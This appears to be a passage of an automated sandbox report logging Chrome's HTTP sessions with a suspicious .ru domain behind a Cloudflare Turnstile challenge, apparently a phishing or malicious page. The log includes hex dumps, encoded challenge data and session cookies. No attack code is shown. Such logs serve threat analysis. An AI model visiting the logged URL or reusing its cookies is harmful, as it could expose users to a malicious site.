37 37 41 41 33 36 4f 2f 30 52 44 79 63 38 4f 69 77 34 4a 41 56 4c 52 68 42 54 4a 45 5a
                                                  Data Ascii: ilNXVXSCWo92hpNamlx4pXSWZWapdF2frIihZ4SJgIWqc3d1kqJ6r5ams3q6fJfFlLaFhseUfb/MqMGHpKmeqcqTl5WwwprPtsbTmtqcut201qWm5bSd3+zI49zPyLLB49bA5fDi5rrbAMzN9L253sT3Cdz95t7jDfbs4e7JEu4SDBbv9xDW8OYL/fEV3SMVHgQpGB8B+RghBBDvMwQm8Tf1FiwUGCcRCv77AA36O/0RDyc8Oiw4JAVLRhBTJEZ
                                                  2024-12-09 08:34:47 UTC1369INData Raw: 48 75 49 5a 34 31 75 6e 6f 39 35 68 47 4e 35 6c 35 36 6c 66 4a 74 6e 70 48 5a 71 59 6d 35 77 65 33 53 77 64 71 46 32 71 70 61 34 62 6f 71 78 6b 4a 75 69 6d 35 32 69 78 63 4c 42 75 49 6e 43 74 72 61 64 78 38 62 4d 6f 4b 37 43 30 71 53 76 77 4a 48 4e 30 4c 75 53 70 63 37 62 74 4e 36 77 31 72 72 69 31 38 44 45 35 62 7a 49 32 4c 33 43 33 75 72 41 71 65 72 73 78 50 58 53 72 2b 33 4b 30 37 7a 46 36 4d 33 57 2f 76 62 2b 30 41 50 52 36 4f 59 47 41 2f 62 32 33 63 7a 77 44 65 44 75 42 4e 7a 6b 37 77 48 52 44 68 48 37 30 75 55 57 39 66 51 66 38 42 63 52 49 78 67 42 42 53 62 38 43 52 6e 39 49 67 6b 72 41 65 6b 72 38 51 55 32 45 2b 38 75 43 78 54 79 4b 43 34 33 50 52 50 30 4d 55 55 5a 4f 53 6b 57 4f 30 51 49 52 69 73 69 54 67 6f 76 54 45 78 4b 4e 53 67 72 46 55 73 30
                                                  Data Ascii: HuIZ41uno95hGN5l56lfJtnpHZqYm5we3SwdqF2qpa4boqxkJuim52ixcLBuInCtradx8bMoK7C0qSvwJHN0LuSpc7btN6w1rri18DE5bzI2L3C3urAqersxPXSr+3K07zF6M3W/vb+0APR6OYGA/b23czwDeDuBNzk7wHRDhH70uUW9fQf8BcRIxgBBSb8CRn9IgkrAekr8QU2E+8uCxTyKC43PRP0MUUZOSkWO0QIRisiTgovTExKNSgrFUs0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  17192.168.2.449765172.67.139.294435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:48 UTC1317OUTGET /favicon.ico HTTP/1.1
                                                  Host: or.smelsgycz.ru
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://or.smelsgycz.ru/OP4lIHE/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  Cookie: XSRF-TOKEN=eyJpdiI6InkzRXYrSnBsanNKeWpocnF5YUtxQnc9PSIsInZhbHVlIjoiMzdtd3UrNDVWRTVlai9vUzFuN04wMHFSUVplcVFNWCt0eU9BNmtBNU5nQ3ZFbkJFeE1RZzFCNWRSa0dDeVpnMXRKVkVGWEExQVVrL2RBVkxaM0k3QXFJeXBQa1lyK3NmaFBCTU5lRnNTMFFxRkZvK0ZkdnhUekwzZ21SRG1rUkQiLCJtYWMiOiIyZTc5Yjc3MmExMzlmNWU1YmJhMzE5ZWEyOTM4YWNkOTg5M2QzM2JhMTg5MGU2NjFjOWEzY2ZjZTUyNDY4MzQ5IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IkZvNm15MEZaMU83WHZuUTc0Mkljd3c9PSIsInZhbHVlIjoiSkpWUWFub2JBUzZ1YThCOWhXM0ZhVGVKVFBrZm53SFY4dFFPL0FneXU0L0d3amVzVmY1cU9ia3JzSjM4T3Bzb1lyRXNYNGhtUEIxOGlzcEZuZDZNNjVYMXpDSU54VEs1N05DL1hKRWlBekliNFdrc0pXV0NFZm9PYXY4dXByNXIiLCJtYWMiOiIyYWI0YjQ5ZDQ3MjJiMzAzNmIyNjBlYzAxZDcxMGViNzMxYWFjYzM1NDRkZDliZDEwYTc3ZTc0ZTUxZmQ3MzdmIiwidGFnIjoiIn0%3D
                                                  2024-12-09 08:34:48 UTC1056INHTTP/1.1 404 Not Found
                                                  Date: Mon, 09 Dec 2024 08:34:48 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Cache-Control: max-age=14400
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4EyngLd2fJaB82tWFgYpHbGqFWSVHVHs38o7MhS9gAy%2BtvEJVbrqUjwnljvvp7h%2FYT%2Bbr1t6nsc5eMWjheLMxMhgs8amKl5bBPSRYo6DX94itmI4W1dQ7M4XOyCKRw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Vary: Accept-Encoding
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4894&min_rtt=4889&rtt_var=1385&sent=4&recv=8&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2230&delivery_rate=577804&cwnd=235&unsent_bytes=0&cid=6f7dd8c03aeb717b&ts=45&x=0"
                                                  CF-Cache-Status: MISS
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a87dbc220c82-EWR
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1529&min_rtt=1524&rtt_var=582&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2827&recv_bytes=1895&delivery_rate=1862244&cwnd=208&unsent_bytes=0&cid=4efb28806579f1f6&ts=658&x=0"
                                                  2024-12-09 08:34:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  18192.168.2.449766104.18.95.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:49 UTC598OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:50 UTC379INHTTP/1.1 404 Not Found
                                                  Date: Mon, 09 Dec 2024 08:34:49 GMT
                                                  Content-Type: application/json
                                                  Content-Length: 7
                                                  Connection: close
                                                  cf-chl-out: f51Op0Aw0n/lw4a8dM/2sJ6pv27ffXLNMFM=$KwJLTYyQrPdYC81u
                                                  cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a8858e5d4235-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:50 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                  Data Ascii: invalid


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  19192.168.2.449767104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:49 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8ef3a85b7bfe0fa7/1733733287497/1a249dc184e71a3ea7313891d85ea4fba010f01b95f1dec42eb842b16d56505f/NapXGCKZtuSC1UI HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=0
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:50 UTC143INHTTP/1.1 401 Unauthorized
                                                  Date: Mon, 09 Dec 2024 08:34:50 GMT
                                                  Content-Type: text/plain; charset=utf-8
                                                  Content-Length: 1
                                                  Connection: close
                                                  2024-12-09 08:34:50 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 47 69 53 64 77 59 54 6e 47 6a 36 6e 4d 54 69 52 32 46 36 6b 2d 36 41 51 38 42 75 56 38 64 37 45 4c 72 68 43 73 57 31 57 55 46 38 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                  Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gGiSdwYTnGj6nMTiR2F6k-6AQ8BuV8d7ELrhCsW1WUF8AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                  2024-12-09 08:34:50 UTC1INData Raw: 4a
                                                  Data Ascii: J


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  20192.168.2.44976835.190.80.14435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:50 UTC534OUTOPTIONS /report/v4?s=4EyngLd2fJaB82tWFgYpHbGqFWSVHVHs38o7MhS9gAy%2BtvEJVbrqUjwnljvvp7h%2FYT%2Bbr1t6nsc5eMWjheLMxMhgs8amKl5bBPSRYo6DX94itmI4W1dQ7M4XOyCKRw%3D%3D HTTP/1.1
                                                  Host: a.nel.cloudflare.com
                                                  Connection: keep-alive
                                                  Origin: https://or.smelsgycz.ru
                                                  Access-Control-Request-Method: POST
                                                  Access-Control-Request-Headers: content-type
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:50 UTC336INHTTP/1.1 200 OK
                                                  Content-Length: 0
                                                  access-control-max-age: 86400
                                                  access-control-allow-methods: OPTIONS, POST
                                                  access-control-allow-origin: *
                                                  access-control-allow-headers: content-type, content-length
                                                  date: Mon, 09 Dec 2024 08:34:50 GMT
                                                  Via: 1.1 google
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  21192.168.2.449769104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:51 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8ef3a85b7bfe0fa7/1733733287501/hCPFhaUF_Cr2Wlr HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: no-cors
                                                  Sec-Fetch-Dest: image
                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:52 UTC200INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:52 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 61
                                                  Connection: close
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a893b99672a1-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:52 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 57 08 02 00 00 00 de 46 11 c6 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                  Data Ascii: PNGIHDR8WFIDAT$IENDB`


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  22192.168.2.44977035.190.80.14435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:51 UTC476OUTPOST /report/v4?s=4EyngLd2fJaB82tWFgYpHbGqFWSVHVHs38o7MhS9gAy%2BtvEJVbrqUjwnljvvp7h%2FYT%2Bbr1t6nsc5eMWjheLMxMhgs8amKl5bBPSRYo6DX94itmI4W1dQ7M4XOyCKRw%3D%3D HTTP/1.1
                                                  Host: a.nel.cloudflare.com
                                                  Connection: keep-alive
                                                  Content-Length: 429
                                                  Content-Type: application/reports+json
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:51 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 31 30 31 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 6f 72 2e 73 6d 65 6c 73 67 79 63 7a 2e 72 75 2f 4f 50 34 6c 49 48 45 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 33 39 2e 32 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72
                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":3101,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://or.smelsgycz.ru/OP4lIHE/","sampling_fraction":1.0,"server_ip":"172.67.139.29","status_code":404,"type":"http.error"},"type":"network-error
                                                  2024-12-09 08:34:52 UTC168INHTTP/1.1 200 OK
                                                  Content-Length: 0
                                                  date: Mon, 09 Dec 2024 08:34:52 GMT
                                                  Via: 1.1 google
                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                  Connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  23192.168.2.449771104.18.95.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:53 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8ef3a85b7bfe0fa7/1733733287501/hCPFhaUF_Cr2Wlr HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  Accept: */*
                                                  Sec-Fetch-Site: none
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:53 UTC200INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:53 GMT
                                                  Content-Type: image/png
                                                  Content-Length: 61
                                                  Connection: close
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a89e0cbd5589-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:53 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 38 00 00 00 57 08 02 00 00 00 de 46 11 c6 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                  Data Ascii: PNGIHDR8WFIDAT$IENDB`


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  24192.168.2.449772104.18.94.414435444C:\Program Files\Google\Chrome\Application\chrome.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-09 08:34:53 UTC1171OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/886786506:1733530621:EAqSDEshVUgRrEF_I8cKkrJx0MsHFLfpUTgE6HdrAZ4/8ef3a85b7bfe0fa7/.jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4 HTTP/1.1
                                                  Host: challenges.cloudflare.com
                                                  Connection: keep-alive
                                                  Content-Length: 31637
                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                  Content-type: application/x-www-form-urlencoded
                                                  CF-Chl-RetryAttempt: 0
                                                  sec-ch-ua-mobile: ?0
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                  CF-Challenge: .jG77cxc1KGWcu2LLqWoWnrRoA1Mo3UMk3KBfzFL0Us-1733733283-1.1.1.1-fnFwjWgIMcbrh.7HH6Feueij1sVE2NIMavS9Nq6meFKwnUnAdcasEk_31SDwzqo4
                                                  sec-ch-ua-platform: "Windows"
                                                  Accept: */*
                                                  Origin: https://challenges.cloudflare.com
                                                  Sec-Fetch-Site: same-origin
                                                  Sec-Fetch-Mode: cors
                                                  Sec-Fetch-Dest: empty
                                                  Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/l1s2c/0x4AAAAAAA0M69ndwcOo8pxI/auto/fbE/normal/auto/
                                                  Accept-Encoding: gzip, deflate, br
                                                  Accept-Language: en-US,en;q=0.9
                                                  2024-12-09 08:34:53 UTC16384OUTData Raw: 76 5f 38 65 66 33 61 38 35 62 37 62 66 65 30 66 61 37 3d 66 72 61 56 4a 71 31 74 44 71 44 7a 72 55 74 2d 30 42 55 68 56 48 37 4e 2d 31 6c 71 5a 55 4e 55 66 61 71 4d 6e 55 6e 56 53 69 64 37 38 32 55 66 56 54 61 38 6e 55 77 54 32 55 38 75 56 55 33 48 55 39 56 55 24 55 6f 70 31 55 31 49 55 54 67 37 5a 61 55 7a 2d 31 31 55 35 61 31 68 55 6c 39 4a 30 25 32 62 24 47 56 55 69 69 55 35 36 75 37 55 64 56 38 7a 6b 49 55 6c 2b 41 55 66 75 31 7a 30 71 32 38 37 31 70 55 70 2d 55 34 55 55 36 48 75 77 32 55 31 73 6c 4e 65 43 6f 53 67 49 55 55 73 67 54 32 37 2b 51 4f 64 6a 54 37 55 4f 54 43 42 72 45 7a 70 43 54 4d 67 61 4b 58 24 72 35 4f 30 64 33 47 65 6d 78 75 75 55 75 4d 67 43 34 64 65 59 35 6c 57 46 68 24 6f 42 41 77 61 54 39 2b 57 32 33 65 44 6e 56 59 6f 43 7a 49 54
                                                  Data Ascii: v_8ef3a85b7bfe0fa7=fraVJq1tDqDzrUt-0BUhVH7N-1lqZUNUfaqMnUnVSid782UfVTa8nUwT2U8uVU3HU9VU$Uop1U1IUTg7ZaUz-11U5a1hUl9J0%2b$GVUiiU56u7UdV8zkIUl+AUfu1z0q2871pUp-U4UU6Huw2U1slNeCoSgIUUsgT27+QOdjT7UOTCBrEzpCTMgaKX$r5O0d3GemxuuUuMgC4deY5lWFh$oBAwaT9+W23eDnVYoCzIT
                                                  2024-12-09 08:34:53 UTC15253OUTData Raw: 55 6c 55 70 6c 55 55 70 76 4a 69 24 75 74 56 49 51 6c 6c 38 43 45 44 55 72 76 52 56 71 30 31 58 75 51 75 55 49 31 77 24 64 48 6c 24 55 6b 62 38 62 36 55 55 4e 75 78 55 6c 75 31 24 55 7a 75 6c 7a 31 6d 55 52 55 71 4d 31 69 55 7a 55 6c 7a 55 55 55 6f 75 4c 45 43 55 6f 2d 71 61 55 7a 54 64 37 38 2d 55 35 55 4c 56 38 72 55 45 55 4f 75 55 24 31 4b 6c 48 75 70 30 55 66 55 7a 75 53 41 55 76 55 75 37 53 7a 55 52 61 2d 75 6c 2b 55 4c 55 31 37 71 74 31 6f 55 38 37 31 46 55 36 55 74 77 6c 31 56 67 75 2d 75 53 46 55 61 55 54 55 6f 62 76 2d 55 65 55 31 75 31 41 55 55 37 6c 6c 31 24 55 44 56 6c 42 31 7a 55 6d 55 54 61 55 42 55 2d 56 55 37 65 4a 6a 6d 56 70 24 31 42 55 24 75 38 6c 55 65 55 43 54 6e 30 31 58 55 30 56 43 44 38 76 55 71 46 4e 2b 55 6e 55 5a 37 55 6d 31 47
                                                  Data Ascii: UlUplUUpvJi$utVIQll8CEDUrvRVq01XuQuUI1w$dHl$Ukb8b6UUNuxUlu1$Uzulz1mURUqM1iUzUlzUUUouLECUo-qaUzTd78-U5ULV8rUEUOuU$1KlHup0UfUzuSAUvUu7SzURa-ul+ULU17qt1oU871FU6Utwl1Vgu-uSFUaUTUobv-UeU1u1AUU7ll1$UDVlB1zUmUTaUBU-VU7eJjmVp$1BU$u8lUeUCTn01XU0VCD8vUqFN+UnUZ7Um1G
                                                  2024-12-09 08:34:54 UTC330INHTTP/1.1 200 OK
                                                  Date: Mon, 09 Dec 2024 08:34:54 GMT
                                                  Content-Type: text/plain; charset=UTF-8
                                                  Content-Length: 26300
                                                  Connection: close
                                                  cf-chl-gen: j2gBOVbbglcuPRPmmzw6QQkVkGVXbdrrcPUwOvVZ0sbi4UN8O/WQYAQWdHRJLXMN2+yeHkfn4x6lxwk3$NLIpLnaXqr1F922d
                                                  Server: cloudflare
                                                  CF-RAY: 8ef3a89eedae72a5-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-12-09 08:34:54 UTC1039INData Raw: 6a 6c 6c 32 54 5a 4b 64 6b 57 35 34 6b 71 46 73 64 6f 2b 46 6c 58 35 36 69 70 53 42 72 6f 61 59 68 62 46 74 71 34 4b 31 73 59 57 51 73 57 79 30 6e 4c 70 2b 76 70 36 4f 6b 36 79 6a 75 61 57 6f 76 4c 36 6c 70 72 66 42 6a 74 43 2f 72 34 71 4c 76 71 57 2f 30 4a 58 4a 77 70 69 6f 7a 37 4b 37 73 4a 6d 38 7a 74 4c 63 72 70 37 63 79 73 6a 55 36 63 4f 32 7a 71 4c 4a 36 71 75 2b 35 4e 4c 50 79 4c 58 4a 34 38 2f 4f 32 74 62 4d 41 2f 79 38 32 66 72 36 43 63 48 6a 78 2b 4c 6a 35 77 6e 4f 33 39 7a 38 46 65 59 58 34 74 58 76 37 50 6e 33 39 75 34 64 39 2b 2f 74 36 69 55 50 46 77 44 32 34 69 58 68 39 51 33 36 47 76 63 45 4b 43 4d 64 4e 43 59 59 42 67 67 6e 47 78 51 32 46 6a 6b 61 44 55 45 4c 47 52 45 33 50 53 59 57 49 2f 77 72 4f 78 77 4c 48 77 70 51 4e 45 68 41 44 6b 45
                                                  Data Ascii: jll2TZKdkW54kqFsdo+FlX56ipSBroaYhbFtq4K1sYWQsWy0nLp+vp6Ok6yjuaWovL6lprfBjtC/r4qLvqW/0JXJwpioz7K7sJm8ztLcrp7cysjU6cO2zqLJ6qu+5NLPyLXJ48/O2tbMA/y82fr6CcHjx+Lj5wnO39z8FeYX4tXv7Pn39u4d9+/t6iUPFwD24iXh9Q36GvcEKCMdNCYYBggnGxQ2FjkaDUELGRE3PSYWI/wrOxwLHwpQNEhADkE
                                                  2024-12-09 08:34:54 UTC1369INData Raw: 38 59 6d 57 5a 6c 36 47 6a 72 61 43 6a 61 32 2b 4e 66 59 53 4c 69 6f 47 6b 65 49 53 44 75 6e 65 32 63 62 6d 7a 6f 37 68 2f 6b 62 57 38 6c 37 36 72 71 38 61 61 76 59 71 62 78 62 4f 6b 76 37 4c 54 70 35 61 32 72 35 61 6b 76 4d 33 41 77 5a 71 35 72 62 48 41 74 61 44 68 70 65 44 42 75 73 65 73 36 73 6e 4a 78 64 54 76 74 4d 65 32 36 72 66 30 78 4c 7a 4e 7a 66 7a 54 77 63 44 42 33 50 6e 65 39 2f 50 79 2f 67 50 33 78 51 45 50 2f 63 72 62 44 76 30 54 39 51 62 79 35 2f 59 55 2b 2f 77 65 43 67 48 32 41 75 49 56 41 2b 58 78 38 65 55 6e 43 43 55 6a 47 65 7a 37 4a 65 77 55 44 2b 38 6a 4b 68 63 35 4e 2f 67 46 43 7a 33 39 46 79 72 2b 4a 52 4a 44 52 53 4d 56 48 52 63 6e 4e 6a 77 50 45 46 4a 4d 4d 6b 6b 4e 44 6a 38 51 45 6b 63 32 4d 41 38 63 47 31 77 76 55 54 78 63 54 56
                                                  Data Ascii: 8YmWZl6GjraCja2+NfYSLioGkeISDune2cbmzo7h/kbW8l76rq8aavYqbxbOkv7LTp5a2r5akvM3AwZq5rbHAtaDhpeDBuses6snJxdTvtMe26rf0xLzNzfzTwcDB3Pne9/Py/gP3xQEP/crbDv0T9Qby5/YU+/weCgH2AuIVA+Xx8eUnCCUjGez7JewUD+8jKhc5N/gFCz39Fyr+JRJDRSMVHRcnNjwPEFJMMkkNDj8QEkc2MA8cG1wvUTxcTV
